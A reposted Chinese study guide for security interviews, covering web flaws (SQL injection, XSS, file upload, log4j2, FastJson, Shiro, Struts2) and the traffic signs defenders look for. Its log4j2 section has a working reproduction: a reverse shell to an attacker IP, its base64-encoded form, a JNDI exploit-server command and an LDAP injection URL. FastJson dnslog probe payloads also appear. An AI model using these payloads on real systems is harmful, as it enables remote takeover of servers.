hw面试总结

news2024/10/6 12:23:05

在这里给大家推荐一个阿里云的活动,可白嫖一年2h4g服务器
活动链接:https://university.aliyun.com/mobile?clubTaskBiz=subTask…11404246…10212…&userCode=ks0bglxp
在这里插入图片描述
在这里插入图片描述

一、漏洞分析

1.SQL注入

原理:

当Web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据

危害:

  1. 泄露大量的用户信息。

  2. 获取管理员密码:攻击者也可以通过获取到的数据,得到后台管理员的密码,然后对网页页面进行恶意篡改。这样不仅对数据库信息安全造成严重威胁,对整个数据库系统安全也影响重大。

  3. 删除数据库,对企业造成重大损失。

1.1.SQL注入常见关键字

1.user()返回当前使用数据库的用户

2.current_user()返回当前用户所对应的授权用户

3.version()返回当前数据库版本信息

4.database()返回当前数据库名

5.group_concat()把数据库中的某列数据或几列数据合并为一个字符串

6.@@datadir数据库路径

7.@@version_compile_os操作系统版本

1.2.分类

1.联合查询

2.布尔盲注

length(),ascii(),mid(),substr(),ord()

3.时间盲注

if(),sleep().benchmark()

4.报错注入

5.宽字节注入

2.XSS

原理:

跨站脚本(Cross-site scripting,简称XSS),是指恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web页面的HTML代码会被执行,从而达到恶意攻击用户的目的。

危害:

1)钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼 JavaScript 以监控目标网站的表单输入,甚至发起基于 DHTML 更高级的钓鱼攻击方式。

2)网站挂马:跨站时利用 IFrame 嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。

3)身份盗用:Cookie 是用户对于特定网站的身份验证标志,XSS 可以盗取到用户的 Cookie,从而利用该 Cookie 盗取用户对该网站的操作权限。如果一个网站管理员用户 Cookie 被窃取,将会对网站引发巨大的危害。

4)盗取网站用户信息:当能够窃取到用户 Cookie 从而获取到用户身份使,攻击者可以获取到用户对网站的操作权限,从而查看用户隐私信息。

5)垃圾信息发送:比如在 SNS 社区中,利用 XSS 漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群。

6)劫持用户 Web 行为:一些高级的 XSS 攻击甚至可以劫持用户的 Web 行为,监视用户的浏览历史,发送与接收的数据等等。

7)XSS 蠕虫:XSS 蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施 DDoS 攻击等。

1.1分类

反射性:也叫做非持久型XSS。攻击者将恶意脚本附加到 url 的参数中,发送给受害者,服务端未经严格过滤处理而输出在用户浏览器中,导致浏览器执行代码数据。

存储型:也叫做持久型XSS。存储型XSS会被保存到数据库,在其他用户访问到这条数据时,这个代码会在访问用户的浏览器端执行。

DOM型

3.文件上传漏洞

原理:

上传文件的时候,如果服务器端后端语言未对上传的文件进行严格的验证和过滤,就容易造成上传任意文件的情况。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而攻击者绕过上传机制上传恶意代码文件并执行从而控制服务器。

危害:

攻击者通过上传恶意文件传递给解释器去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理、命令执行等恶意操作。从而控制整个网站,甚至是服务器。

1.1.漏洞防御措施

1、 上传的目录设置为不可执行。只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本文件,服务器本身也不会受到影响,因此这一点至关重要。

2、 对文件后缀的判断中使用白名单的方式。

3、 文件服务器和web服务器分离,也就是上传的文件单独存放到其他的服务器之中。

4、 不需要返回文件路径的情况下,随机改写文件名。

4.跨站请求伪造漏洞

5.服务器请求伪造

6.RCE

7.Struts2-045

漏洞原因:

基于Jakarta Multipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值,可通过精心构造附带OGNL表达式的URL导致远程代码执行。

8.log4j2(必问)

漏洞原理:

log4j2 中存在 JNDI 注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
下面是触发漏洞的两部分关键代码:
1.org·apache.logging.log4j.core.pattern.MessagePatternconverter 的 format()方法(表达式内容替换)
2.apache.logging.log4j.core.lookup.StrSubstitutor(提取字符串,并通过 lookup 进行内容替换)
这部分内容重点就在于代码的主要内容就是一旦发现日志中包含 ${}就会将表达式的内容替换为表达式解析后的内容,而不是表达式本身,从而导致攻击者构造符合要求的表达式供系统执行。

在 ${}中可以使用的部分关键词如下:

${java:version}getSystemProperty("java.version")
${java:runtime} getRuntime()
${java:vm) getVirtualMachine()
${java:os} getOperatingSystem()
${java:hw} getHardware( )
${java:locale} getLocale()

${env:CLASSPATH}
${env:HOME}
${env:JAVA_HOME}
${env:LANG}
${env:LC_TERMINAL}

${jndi:ldap://ip/port/exp}

最终效果就是通过jndi 注入,借助 ldap 服务来下载执行恶意 payload,从而执行命令

JNDI介绍

Java Naming and Directory Interface,JAVA命名和目录接口(命名服务接口)应用通过该接口与具体的目录服务进行交互,允许通过名称发现和查找数据或对象,可用于动态加载配置等。
JNDI可以访问以下命名/目录服务:
。RMI(JAVA远程方法调用)
。LDAP(轻量级目录访问协议)
。CORBA(公共对象请求代理体系结构)
。DNS(域名服务)

LDAP协议

LDAP(Ligntweight Directory Access Protocol),轻量级目录访问协议,既是一种服务,也是一种协议,是JNDI的一种底层实现,主要功能是提供命名关键字到对象的映射目录,开发人员可以通过输入名称,获取到对象的内容。简单来说,就是搜索功能,它是分布式的,允许从远程服务器上面加载获取对象。默认服务端口389
在这里插入图片描述
在这里插入图片描述

复现过程:

首先检测站点是否存在JNDI注入漏洞

使用dnslog平台生成一个临时域名

在这里插入图片描述

在要测试的站点中使用jndi访问此域名,若能解析代表存在jndi注入漏洞

注入点是/admin/cores?action=

那么就在此处传入192.168.31.63:8983/solr/admin/cores?action=${jndi:dns://ylx7kn.dnslog.cn}

发现dnslog平台有解析记录说明该站点存在此jndi注入漏洞

在这里插入图片描述

1.构造反弹shell payload

将目标shell反弹到 192.168.31.90/6666 上

bash -i >& /dev/tcp/192.168.31.90/6666 0>&1

进行base64编码,因为可能会对特殊字符进行过滤

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjkwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar将我们的攻击机作为ldap服务端

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjkwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}” -A “192.168.31.90”

在这里插入图片描述

开启监听我们攻击机的6666端口

在这里插入图片描述

随后在存在JNDI注入漏洞的站点,将我们构造好的payload传入

http://192.168.31.63:8983/solr/admin/cores?action=${jndi:ldap://192.168.31.90:1389/Exploit}

在这里插入图片描述

返回攻击机查看发现成功拿到目标shell

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

9.FastJson

原理

fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,就会读取 @type 的内容,试图把JSON内容反序列化成这个对象,并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链

java.net.InetAddress 这个类在实例化时会尝试对 example.com 进行域名解析,这时候可以通过 dnslog的方式得知漏洞是否存在,比如如下的存在

{
	"name" :{
		"@type" :"java.net.InetAddress"
		"va1":"任意字符,qydzoe.dnslog.cn"
	}
}

{
	"name" : {
		"@type" :"Ljava.net.InetAddress;"
		"val":"任意字符.qydzoe.dnslog.cn"
	}
}

{
	"name" :{
		"@type":"LLjava.net.InetAddress;"
		"va1":"任意字符.qydzoe.dnslog.cn"
	}
}

10.shiro-550

一句话总结,shiro框架提供了记住密码的功能,然后在生成cookie时使用了AES加密,AES是对称加密,采用了默认秘钥。所以攻击就能使用默认秘钥进行构造恶意cookie,从而达到反弹shell

Shiro550和Shiro721利用过程中有着显著的区别
1、Shiro550漏洞,使用已知的密钥进行攻击(秘钥是固定或者默认的),这意味着攻击者可以利用硬编码的AES密钥,来构造恶意的序列化对象。攻击者不需要拥有有效的RememberMe Cookier来执行攻击,只要有足够的密钥库即可。

2、Shiro721漏洞,加密使用的密钥是系统随机生成的,这使得攻击者难以直接猜测或使用已知的密钥进行攻击。攻击者需要利用登录后的RememberMe Cookie作为Padding Oracle Attack的前缀,然后精心构造RememberMe Cookie值来实现反序列化漏洞攻击。相比Shiro550,Shiro721的利用条件更高,因为它要求攻击者已经拥有一个有效的登录会话

二、流量特征

1.SQL注入流量分析

会有明显的注入语句。判断是否注入成功可以查找是否返回数据库名通过

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

因为我们是防守人员可以直接查找响应中是否返回了我们的数据库名

在这里插入图片描述

sqlmap流量特征

sqlmap会在注入点尝试大量的注入,可以明显观察到很多相似的数据流

最重要的是sqlmap会将自己的版本号在UA投中输出

在这里插入图片描述
在这里插入图片描述

2.XSS流量分析

反射型在url中能观察到明显的js语句
在这里插入图片描述

3.文件上传流量分析

上传正常文件时,流量会显示正确的文件类型

在这里插入图片描述

查看正常上传的响应包

在这里插入图片描述

而如果上传的是木马文件则不会在流量描述中显示文件类型

在这里插入图片描述

在这里插入图片描述

可以查看上传的内容显示分组字节,发现是一句话木马

在这里插入图片描述

攻击者会验证是否上传成功,这种流量则是能够查看到访问了文件上传的目录且通过追踪流会看到执行了什么命令

在这里插入图片描述

在这里插入图片描述

4.目录扫描流量分析

会有大量404,切夹杂着很多不同目录

在这里插入图片描述

5.口令爆破流量分析

会有大量相同的请求长度,且响应长度相同

在这里插入图片描述

在响应长度中会有一个不同的,这个就是爆破成功的响应

在这里插入图片描述

查看传入数据也为正确

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

6.RCE流量分析

可以看到whoami这是明显的命令

在这里插入图片描述

在响应中也找到了whoami执行的结果

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

可以查看到明显的木马
在这里插入图片描述

再查看响应

这种木马是输出了一个文件所以这里无法查看,那么就要看攻击者是否使用了一句话木马

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

发现访问此前上传的木马,并且扎起下方有一个post请求,查看post请求执行了什么

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

这说明攻击者已经拿到了服务器的控制权了

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

7.log4j2流量分析

网站流量中有明显的jndi注入语句

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

且在利用时会请求恶意的java类

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

查看此流量可以观察到base64编码后的反弹shell命令

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

8.FastJson流量分析

@tyep

9.shiro流量分析

工具探测shiro流量

请求包这种cookie会有remenberMe=yes

爆破秘钥流量,会有大量探测cookie的请求包

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

没有爆破成功会有响应remenberMe=deletMe

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

成功则没有

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

命令执行流量特征

请求包中会有执行的命令,且响应包会返回对应命令的结果

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

10.Struts2流量分析

工具探测流量

会有大量相似请求,且其中会有大量%,@,且会有multipart/from-data

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

命令执行流量

Struts2-045

会更改Content-Type,且会在其中看到命令

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

命令执行结果是通过tcp流量传回

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

11.weblogic流量分析

大部分是t3协议

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1821538.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

LLM之RAG实战(四十)| 使用LangChain SQL Agent和MySQL搭建多层RAG ChatBot

在传统的意义上,RAG 主要是从文档中检索用户想要的数据,从而提高大模型的能力,减少幻觉问题。今天,我们从另一个维度介绍RAG,RAG不从文档中获取数据,而是从MySQL数据库检索数据。我们可以使用LangChain SQL…

Nature子刊:你的健康在出生就被肠道病毒定义了?

近期,四川大学最新在《Nature Communications》期刊上(IF16.6)发表的“A metagenomic catalog of the early-life human gut virome”研究论文中,通过对宏病毒组结果进行分析,提供了最全面和最完整的生命早期人类肠道病毒组蓝图。 期刊&#…

[图解]《分析模式》漫谈03-Party是什么

1 00:00:00,790 --> 00:00:03,930 今天我们来看一下,Party是什么 2 00:00:05,710 --> 00:00:07,470 当然我们这里说的不是政治的 3 00:00:07,880 --> 00:00:08,350 Party 4 00:00:09,230 --> 00:00:11,110 是《分析模式》里面的一个用词 5 00:00:14…

短信群发平台选择时要看好对方的资质等问题!

在数字化营销日益盛行的今天,短信群发平台已成为企业与用户沟通的重要桥梁。然而,选择一个合适的短信群发平台并非易事,尤其需要考虑对方的资质等关键问题。 首先,资质是衡量一个短信群发平台是否正规、专业的重要指标。在选择平…

美团的 AI 面试有点简单

刷到一个美团的 AI 实习生的面试帖子,帖子虽然不长,但是把美团 AI 评测算法实习生面试的问题都po出来了。 单纯的看帖子中面试官提出的问题,并不是很难,大部分集中在考察AI项目和对AI模型的理解上,并没有过多的考察AI算…

企业服务器上云还是下云哪种比较好?-尚云Sunclouds

如今很多中小企业都面临一个艰难的选择,是要选择将服务器迁移至数据中心托管(下云)或者直接迁移到云端(上云)。中小企业是社会发展的中坚力量,他们的特点少而明显:资金少,增长快&…

【GTD时间管理法】“让‘聪明的自己“为“不太聪明的自己”打点好一切!

大脑是用来思考而不是用来记事的。 该如何解放大脑,让我们能够有条不紊地处理好一切事情呢? 世界知名时间管理大师戴维艾伦认为,只需要三个步骤:清空大脑——制订计划——行动起来。他把这种时间管理方法称作“GTD”&#xff0c…

【投稿优惠|权威主办】2024年能源、智能制造与材料科学国际学术会议(ICEIMMS 2024)

【投稿优惠|权威主办】2024年能源、智能制造与材料科学国际学术会议(ICEIMMS 2024) 2024 International Academic Conference on Energy, Intelligent Manufacturing, and Materials Science(ICEIMMS 2024) ▶会议简介 2024年能源…

净化机应用领域广泛 美国是我国净化机主要出口国

净化机应用领域广泛 美国是我国净化机主要出口国 净化机,又称为空气清洁设备或空气清新机,是一种专门设计用于滤除或杀灭空气污染物、提升空气清洁度的装置。净化机具备高效的过滤功能,能够滤除空气中的悬浮微粒、细菌、病毒和花粉等污染物&a…

Element UI 一键校验多表单(v-for循环表单,异步校验规则,v-for 中的 ref 属性,避坑 forEach 不支持异步 await )

需求描述 表单为数组 v-for 循环得到的多表单,如可自由增删的动态表单表单中存在异步校验规则,如姓名需访问接口校验是否已存在点击提交按钮,需一键校验所有表单,仅当所有表单都通过校验,才能最终提交到后台 效果预览 …

大模型应用之路:从提示词到通用人工智能(AGI)

前言 大模型在人工智能领域的应用正迅速扩展,从最初的提示词(Prompt)工程到追求通用人工智能(AGI)的宏伟目标,这一旅程充满了挑战与创新。本文将探索大模型在实际应用中的进展,以及它们如何为实…

微服务开发与实战Day07 - MQ高级篇

一、消息可靠性问题 首先,分析一下消息丢失的可能性有哪些。 消息从发送者发送消息,到消费者处理消息,需要经过的流程是这样的: 消息从生产者到消费者的每一步都可能导致消息丢失: 发送消息时丢失: 生产…

【车载AI音视频电脑】200万像素迷你一体机

产品主要特点: -设备安装方便简洁,可通过3M胶直接将设备粘 贴到车前挡风玻璃上 -支持IE预览,手机,PAD实时预览, 支持电脑客 户端实时预览功能 -内置2路模拟高清, 每路均可达到200万像素。另 外可扩充2路1080P模拟…

取证工作: SysTools SQL Log Analyzer, 完整的 SQL Server 日志取证分析

天津鸿萌科贸发展有限公司是 Systools 系列软件的授权代理商。 SysTools SQL Log Analyzer 是 Systools 取证工具系列之一,用于调查 SQL Server 事务日志,以对数据库篡改进行取证分析。 什么是 SQL Server 事务日志? 在深入研究 SQL 事务日…

【Linux文件篇】磁盘到用户空间:Linux文件系统架构全景

W...Y的主页 😊 代码仓库分享 💕 前言:我们前面的博客中一直提到的是被进程打开的文件,而系统中不仅仅只有被打开的文件还有很多没被打开的文件。如果没有被打开,那么文件是在哪里进行保存的呢?那我们又如何快速定位…

Vue.js入门教程:轻松掌握前端框架的魔法

随着前端技术的飞速发展,Vue.js凭借其简洁、易上手和高效的特点,成为了前端开发者们的新宠。本文将带你走进Vue.js的世界,从零开始,一步步掌握这个强大的前端框架。 一、什么是Vue.js Vue.js是一款构建用户界面的渐进式JavaScri…

数据结构——栈(Stack)详解

1. 栈(Stack) 1.1 概念 栈:一种特殊的线性表,只允许在固定的一端进行插入和删除元素操作。进行数据插入和删除操作的一端称为栈顶,另一端称为栈底。栈中数据元素遵循后进先出LIFO(Last In First Out)的原则 压栈&am…

可再生能源的未来——Kompas.ai如何助力绿色发展

引言 在全球气候变化和能源危机的背景下,可再生能源逐渐成为能源发展的重要方向。本文将探讨可再生能源的发展趋势,并介绍Kompas.ai如何通过AI技术助力绿色发展的实现。 可再生能源的发展及其重要性 可再生能源是指通过自然资源产生的能源,…

Zabbix 7.0 新增功能亮点(二)——history.push API方法

Zabbix7.0LTS一经发布便吸引了众多运维小伙伴的关注,乐维社区forum.lwops.cn也伴随着不少小伙伴的热议与探讨,话不多说,抓紧上车。 前面我们介绍了zabbix 7.0 新增功能亮点(一)——T参数,本篇将向大家介绍z…

2024热门骨传导耳机购买推荐!精选五款好用不贵!

对于很多喜欢运动健身的小伙伴,在现在市面上这么多种类耳机的选择上,对于我来说的话还是很推荐大家去选择骨传导运动耳机的,相较于普通的入耳式蓝牙耳机,骨传导耳机是通过振动来传输声音的,而入耳式耳机则是通过空气传…